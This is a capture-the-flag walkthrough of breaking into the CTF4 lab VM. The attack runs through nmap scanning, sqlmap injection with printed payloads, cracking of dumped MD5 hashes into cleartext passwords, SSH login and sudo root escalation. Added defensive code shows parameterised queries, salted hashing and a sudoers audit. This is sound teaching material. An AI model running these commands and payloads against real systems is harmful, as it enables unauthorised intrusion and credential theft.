CTF4 target VM penetration walkthrough

Host discovery

Command used:
netdiscover

┌──(root💀kali)-[~]
└─# netdiscover

The target host's IP address is found to be 1.1.2.150

Port scanning

Command used:
nmap -A -v -sS -sV -p- 1.1.2.150

┌──(root💀kali)-[~]
└─# nmap -A -v -sS -sV -p- 1.1.2.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 09:26 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:26
Completed NSE at 09:26, 0.00s elapsed
Initiating NSE at 09:26
Completed NSE at 09:26, 0.00s elapsed
Initiating NSE at 09:26
Completed NSE at 09:26, 0.00s elapsed
Initiating ARP Ping Scan at 09:26
Scanning 1.1.2.150 [1 port]
Completed ARP Ping Scan at 09:26, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:26
Completed Parallel DNS resolution of 1 host. at 09:26, 0.02s elapsed
Initiating SYN Stealth Scan at 09:26
Scanning 1.1.2.150 [65535 ports]
Discovered open port 25/tcp on 1.1.2.150
Discovered open port 22/tcp on 1.1.2.150
Discovered open port 80/tcp on 1.1.2.150

Parameter notes:
-A: aggressive scan of the target IP (OS detection, version detection, default NSE scripts, traceroute), to gather as much information as possible.
-v: verbose output of the scan progress.
-sS: TCP SYN scan.
-sV: probe open ports to determine the service and version.
-p-: scan all 65535 ports.

The scan shows the target has three ports open: 22 (SSH), 25 (SMTP) and 80 (HTTP).

Vulnerability discovery

Testing the page shows that appending a single quote to the parameter produces a database error.

[screenshot of the error page omitted]

Use the following command to enumerate the table names:

sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 --tables
                                                                                                                                                                      
┌──(root💀kali)-[~]
└─# sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 --tables


Database: ehks
[3 tables]
+---------------------------------------+
| user                                  |
| blog                                  |
| comment                               |
+---------------------------------------+

Use the following command to enumerate the columns of the user table:

sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns
┌──(root💀kali)-[~]
└─# sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns

[08:20:15] [INFO] fetching columns for table 'user' in database 'ehks'
Database: ehks
Table: user
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_id   | int(11)     |
| user_name | varchar(20) |
| user_pass | varchar(32) |
+-----------+-------------+

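The injection point sqlmap exploited is the id parameter being pasted straight into a query. The block below is an added example, not code from the write-up or from the CTF4 application: it rebuilds the pattern against a constructed in-memory SQLite copy of the blog table (table and column names are assumptions modelled on the sqlmap output), shows why appending a true versus a false condition yields the boolean-based blind oracle sqlmap reported, and puts the parameterised, type-checked version beside it.

```python
"""Added example (not from the original write-up): why the page's id parameter
leaks data, and how a validated, parameterised query closes the hole.

The schema is a constructed stand-in for the target's blog table; the rows are
made up."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory database that mimics the target's blog table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE blog (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO blog (id, title, body) VALUES (?, ?, ?)",
        [(1, "First post", "hello"), (2, "Second post", "world")],
    )
    return conn


def blog_title_vulnerable(conn: sqlite3.Connection, id_param: str):
    """The pattern behind the finding: the GET parameter becomes part of the SQL.

    Whatever the client sends is parsed as SQL, so a tail such as ' AND 1=2'
    changes the WHERE clause. Returns the title or None."""
    sql = f"SELECT title FROM blog WHERE id = {id_param}"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def blog_title_safe(conn: sqlite3.Connection, id_param: str):
    """Hardened version: validate the type first, then bind the value.

    The database receives the SQL text and the value separately, so the value
    can never be interpreted as SQL. Rejecting non-integers before the query
    also keeps malformed input away from the database entirely."""
    try:
        blog_id = int(id_param)
    except ValueError:
        return None  # a web handler would answer 400 Bad Request here
    row = conn.execute("SELECT title FROM blog WHERE id = ?", (blog_id,)).fetchone()
    return row[0] if row else None


def boolean_oracle_present(query_fn, conn: sqlite3.Connection) -> bool:
    """Regression check: does a true vs. a false condition appended to a valid
    id change the answer? That difference is the 'boolean-based blind' signal
    sqlmap reported. A correctly bound query answers both identically."""
    true_case = query_fn(conn, "2 AND 1=1")
    false_case = query_fn(conn, "2 AND 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable oracle:", boolean_oracle_present(blog_title_vulnerable, db))
    print("safe oracle:     ", boolean_oracle_present(blog_title_safe, db))
```

Run it and the vulnerable function answers "Second post" for `2 AND 1=1` and nothing for `2 AND 1=2`, which is all a blind extraction needs; the safe function returns nothing for both because neither is an integer, and the oracle check reports no difference.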
Use the following command to dump the user names and password hashes:

sqlmap -u http://1.1.2.150/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns -C user_name,user_pass --dump
             
        ___
       __H__                                                                                                                                                          
 ___ ___[)]_____ ___ ___  {1.4.11#stable}                                                                                                                             
|_ -| . [.]     | .'| . |                                                                                                                                             
|___|_  [.]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   http://sqlmap.org                                                                                                                           

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:35:50 /2021-04-07/

[08:35:50] [INFO] resuming back-end DBMS 'mysql' 
[08:35:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=blog&title=Blog&id=2 AND 1944=1944

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=blog&title=Blog&id=2 AND (SELECT 6440 FROM (SELECT(SLEEP(5)))ntAT)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x7170786a71,0x57704a764f7569574244654e6b65534a547a46427470666a76667a744d44646e424e425548634745,0x716b706b71),NULL,NULL-- -
---
[08:35:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:35:50] [INFO] fetching tables for database: 'ehks'
Database: ehks
[3 tables]
+---------+
| user    |
| blog    |
| comment |
+---------+

[08:35:50] [INFO] fetching columns 'user_name, user_pass' for table 'user' in database 'ehks'
Database: ehks
Table: user
[2 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_name | varchar(20) |
| user_pass | varchar(32) |
+-----------+-------------+

[08:35:50] [INFO] fetching entries of column(s) 'user_name,user_pass' for table 'user' in database 'ehks'
[08:35:50] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[08:36:01] [INFO] writing hashes to a temporary file '/tmp/sqlmapl0y6hvjq1955/sqlmaphashes-llvl1jy9.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[08:36:06] [INFO] using hash method 'md5_generic_passwd'
[08:36:06] [INFO] resuming password 'ilike2surf' for hash '02e823a15a392b5aa4ff4ccb9060fa68' for user 'dstevens'
[08:36:06] [INFO] resuming password 'seventysixers' for hash 'b46265f1e7faa3beab09db5c28739380' for user 'achen'
[08:36:06] [INFO] resuming password 'Homesite' for hash '8f4743c04ed8e5f39166a81f26319bb5' for user 'pmoore'
[08:36:06] [INFO] resuming password 'Sue1978' for hash '7c7bc9f465d86b8164686ebb5151a717' for user 'jdurbin'
[08:36:06] [INFO] resuming password 'pacman' for hash '64d1f88b9b276aece4b0edcc25b7a434' for user 'sorzek'
[08:36:06] [INFO] resuming password 'undone1' for hash '9f3eb3087298ff21843cc4e013cf355f' for user 'ghighland'
Database: ehks
Table: user
[6 entries]
+-----------+--------------------------------------------------+
| user_name | user_pass                                        |
+-----------+--------------------------------------------------+
| dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+-----------+--------------------------------------------------+

[08:36:06] [INFO] table 'ehks.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/1.1.2.150/dump/ehks/user.csv'
[08:36:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/1.1.2.150'

[*] ending @ 08:36:06 /2021-04-07/
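The dump was cracked in seconds because user_pass is a 32-character unsalted MD5 digest: sqlmap recognised the format and ran a wordlist against every row at once. The following is an added example, not part of the write-up or the target application, contrasting that scheme with salted, iterated PBKDF2 and showing how an application can migrate legacy rows on the user's next successful login. The record format and the iteration count are assumptions; the account used in the demo is constructed, not one of the users above.

```python
"""Added example (not from the write-up): why the dumped hashes fell to a
dictionary attack, and what the storage should look like instead."""
import hashlib
import hmac
import os
import re
from typing import Optional, Tuple

PBKDF2_ITERATIONS = 600_000  # assumption: current OWASP work factor for HMAC-SHA256
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")


def legacy_md5(password: str) -> str:
    """The scheme found on the target: fast, unsalted, and identical for every
    user who chooses the same password, so one wordlist pass covers all rows."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, slow hash stored as 'pbkdf2_sha256$iterations$salt$digest'.

    A fresh 16-byte salt per user means equal passwords give different records,
    so a cracked row says nothing about the others, and the iteration count
    makes every guess cost hundreds of thousands of hash computations."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def needs_rehash(stored: str) -> bool:
    """True for legacy MD5 rows, which should be upgraded at next login."""
    return LEGACY_MD5.match(stored) is not None


def verify_password(stored: str, password: str) -> bool:
    """Check a password against either record format using a constant-time compare."""
    if needs_rehash(stored):
        return hmac.compare_digest(stored, legacy_md5(password))
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, digest_hex = parts
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def login(stored: str, password: str) -> Tuple[bool, str]:
    """Authenticate and, when the row is legacy MD5, return the upgraded record.

    The plaintext is only available at login time, so that is the moment to
    migrate; the caller writes the second element back to the database."""
    if not verify_password(stored, password):
        return False, stored
    return True, (hash_password(password) if needs_rehash(stored) else stored)


if __name__ == "__main__":
    row = legacy_md5("correct horse")  # constructed legacy account
    ok, upgraded = login(row, "correct horse")
    print(ok, upgraded.startswith("pbkdf2_sha256$"))
    print(verify_password(upgraded, "correct horse"), verify_password(upgraded, "wrong"))
```

Note that the upgraded record no longer fits a varchar(32) column, which is usually the first schema change such a migration needs.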

SSH login with the recovered credentials

Trying to log in over SSH with one of the recovered accounts fails with an error:
line 53: Bad configuration option: permitrootlogin

┌──(root💀kali)-[~]
└─# ssh achen:seventysixers@1.1.2.150                                                                                                                          
/etc/ssh/ssh_config: line 53: Bad configuration option: permitrootlogin
/etc/ssh/ssh_config: terminating, 1 bad configuration options

Edit ssh_config and comment out the PermitRootLogin line (PermitRootLogin is an sshd_config directive, so the client rejects it):

┌──(root💀kali)-[~]
└─# vi /etc/ssh/ssh_config
#   PermitRootLogin yes

Retrying ssh still fails, now with the following error:
Unable to negotiate with 1.1.2.150 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

┌──(root💀kali)-[~]
└─# ssh dstenvens@1.1.2.150   
Unable to negotiate with 1.1.2.150 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

┌──(root💀kali)-[~]
└─# ssh achen@1.1.2.150
Unable to negotiate with 1.1.2.150 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

The server only offers SHA-1 based key exchange methods, including the 1024-bit group1, which current OpenSSH clients disable by default; on a production host the fix would be to update sshd, but for the lab the client can re-enable one of them. Create the .ssh/config file with the following content:

┌──(root💀kali)-[~]
└─# vi .ssh/config            

Host 1.1.2.150
        KexAlgorithms +diffie-hellman-group1-sha1
# Note: Host is the IP address of the CTF4 server
# note the space before +diffie

Retrying the SSH login with the recovered account now succeeds:

┌──(root💀kali)-[~]
└─# ssh achen@1.1.2.150
The authenticity of host '1.1.2.150 (1.1.2.150)' can't be established.
RSA key fingerprint is SHA256:NDWh6/414mOsW4P7K6ICc5R67PrX87ADMFUx9DK9ftk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '1.1.2.150' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@1.1.2.150's password: 
Last login: Tue Mar 10 12:45:06 2009
[achen@ctf4 ~]$ whoami
achen

Privilege escalation

Escalate with the sudo command:

[achen@ctf4 ~]$ sudo su
[root@ctf4 achen]# 
[root@ctf4 achen]# netstat -pantu | grep 22
tcp        0      0 0.0.0.0:25                  0.0.0.0:*                   LISTEN      2422/sendmail: acce 
tcp        0      0 :::22                       :::*                        LISTEN      2283/sshd           
tcp        0      0 ::ffff:1.1.2.150:22         ::ffff:1.1.2.129:47108      ESTABLISHED 3881/sshd: achen [p 

Use sudo -l to list the current user's sudo rights:

[root@ctf4 achen]# sudo -l
User achen may run the following commands on this host:
    (ALL) ALL

Privilege escalation succeeded: the (ALL) ALL rule lets achen run any command as any user with nothing more than achen's own password, so sudo su gives a root shell directly.
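The root cause is a single sudoers rule, and it is the kind of thing a configuration audit should catch before an attacker does. The block below is an added example, not part of the write-up or of the target's real sudoers file: it parses sudoers-style rule lines from a constructed sample (modelled on the (ALL) ALL rule seen above) and flags rules that amount to handing out root, whether through ALL commands, a shell-capable command, or a missing password requirement. The rule grammar it accepts is a simplified assumption covering the common one-line form only.

```python
"""Added example (not from the write-up): flag sudoers rules that grant full root."""
import re
from typing import Dict, List, Optional

# Simplified sudoers rule: who host=(runas) [TAG:]... command[, command...]
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)

# Commands that yield an interactive shell or arbitrary code when run as root
SHELL_CAPABLE = {"/bin/bash", "/bin/sh", "/bin/su", "/usr/bin/su", "/usr/bin/vi", "/usr/bin/vim"}

# Constructed sample file, modelled on the finding on this box
SAMPLE_SUDOERS = """\
# constructed sample, not the target's real /etc/sudoers
Defaults    requiretty
root    ALL=(ALL) ALL
achen   ALL=(ALL) ALL
%wheel  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) /usr/bin/rsync
ops     ALL=(root) /usr/sbin/service httpd restart, /usr/bin/vim
"""


def parse_rule(line: str) -> Optional[dict]:
    """Return the parts of one rule, or None for blanks, comments, Defaults and aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
        return None
    m = RULE.match(line)
    if m is None:
        return None
    return {
        "who": m["who"],
        "host": m["host"],
        "runas": (m["runas"] or "root").strip(),
        "nopasswd": "NOPASSWD" in m["tags"],
        "cmds": [c.strip() for c in m["cmds"].split(",")],
    }


def audit_sudoers(text: str) -> Dict[str, List[str]]:
    """Map each flagged principal to the reasons its rule is root-equivalent.

    root's own rule is the expected baseline and is skipped; every other rule
    is flagged for ALL commands or for a shell-capable command, and NOPASSWD
    is reported on top of either of those."""
    findings: Dict[str, List[str]] = {}
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["who"] == "root":
            continue
        reasons = []
        if "ALL" in rule["cmds"]:
            reasons.append(f"any command as {rule['runas']}")
        for cmd in rule["cmds"]:
            path = cmd.split()[0]
            if path in SHELL_CAPABLE:
                reasons.append(f"shell-capable command {path} as {rule['runas']}")
        if reasons and rule["nopasswd"]:
            reasons.append("no password required")
        if reasons:
            findings.setdefault(rule["who"], []).extend(reasons)
    return findings


if __name__ == "__main__":
    for who, reasons in audit_sudoers(SAMPLE_SUDOERS).items():
        print(f"{who}: {'; '.join(reasons)}")
```

On the sample, achen and %wheel are flagged for unrestricted commands (the latter also without a password), ops for vim as root, and the narrowly scoped rsync rule for backup passes; the first of those is the exact condition that let the write-up's sudo su succeed.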
